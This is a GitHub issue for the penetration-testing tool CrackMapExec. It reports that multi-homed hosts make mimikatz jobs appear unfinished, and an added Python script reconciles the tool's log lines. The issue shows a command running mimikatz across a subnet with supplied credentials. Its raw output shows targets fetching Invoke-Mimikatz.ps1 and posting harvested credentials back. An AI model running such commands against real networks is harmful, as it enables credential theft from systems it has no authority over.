byt3bl33d3r/CrackMapExec

Issue with multi-homed hosts

Open

#169 opened on April 25, 2017

Labels: bug, help wanted

Description

Not sure if this is even worth addressing, but I just noticed on an engagement today that many of the hosts that never finish are in fact finishing, but are multi-homed. Here is example output from a system that I RDP'ed into to verify that all IPs were assigned to the same host:

cme smb 1.2.3.0/24 -u someuser -p 'somepassword' -M mimikatz
SMB         1.2.3.200  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.200  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_222944.log
SMB         1.2.3.205  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.202  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.210  445 DOMAIN           [*] Windows Web Server 2008 R2 7601 Service Pack 1 x64 (name:DOMAIN) (domain:CUD) (signing:False)
SMB         1.2.3.205  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
SMB         1.2.3.202  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
SMB         1.2.3.210  445 DOMAIN           [+] DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.205  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.210  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.202  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223044.log
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223045.log
MIMIKATZ    1.2.3.200                       [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       DOMAIN:USER:PASSWORD
MIMIKATZ    1.2.3.200                       (null)\USER:PASSWORD
MIMIKATZ    1.2.3.200                       [+] Added 6 credential(s) to the database
MIMIKATZ    1.2.3.200                       [*] Saved raw Mimikatz output to Mimikatz-1.2.3.200-2017-04-24_223052.log
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
MIMIKATZ                                         [*] Waiting on 3 host(s)
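
Added example, not part of the original issue and not CrackMapExec code: a reconciliation of launcher lines against result lines, run over constructed sample lines in the same column layout as the output above. It assumes, as an inference from the output only, that the pending count is kept per target address; `reconcile` and its field names are hypothetical.

```python
import re
from collections import Counter

# Constructed sample in the column layout of the output above (not a real capture).
SAMPLE = """\
MIMIKATZ    1.2.3.200  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.205  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.210  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.202  445 DOMAIN           [+] Executed launcher
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ    1.2.3.200                       [*] - - "POST / HTTP/1.1" 200 -
MIMIKATZ                                         [*] Waiting on 3 host(s)
"""

IP = r"(\d+\.\d+\.\d+\.\d+)"
LAUNCH = re.compile(r"^\S+\s+" + IP + r"\s+\d+\s+\S+\s+\[\+\] Executed launcher")
RESULT = re.compile(r"^\S+\s+" + IP + r'\s+\[\*\] - - "POST / HTTP')
WAITING = re.compile(r"Waiting on (\d+) host\(s\)")

def reconcile(text):
    """Compare per-address and per-job accounting of launcher results."""
    launched, results, waiting = [], Counter(), None
    for line in text.splitlines():
        if m := LAUNCH.match(line):
            launched.append(m.group(1))      # address the job was sent to
        elif m := RESULT.match(line):
            results[m.group(1)] += 1         # address the result came back from
        elif m := WAITING.search(line):
            waiting = int(m.group(1))        # last pending count the tool printed
    # Per-address view: a target counts as done only if a result came from it.
    pending_by_ip = sorted(set(launched) - set(results))
    # Addresses that returned more results than jobs were sent to them.
    surplus = {ip: n - launched.count(ip)
               for ip, n in results.items() if n > launched.count(ip)}
    return {
        "pending_by_ip": pending_by_ip,
        "surplus_results": surplus,
        "waiting_reported": waiting,
        # Per-job view: one result per launch, whatever interface it left from.
        "all_jobs_returned": sum(results.values()) == len(launched),
    }

if __name__ == "__main__":
    print(reconcile(SAMPLE))
```

The three addresses left pending match the reported wait count, while the surplus of three results on 1.2.3.200 shows the jobs did return, just from the host's primary interface.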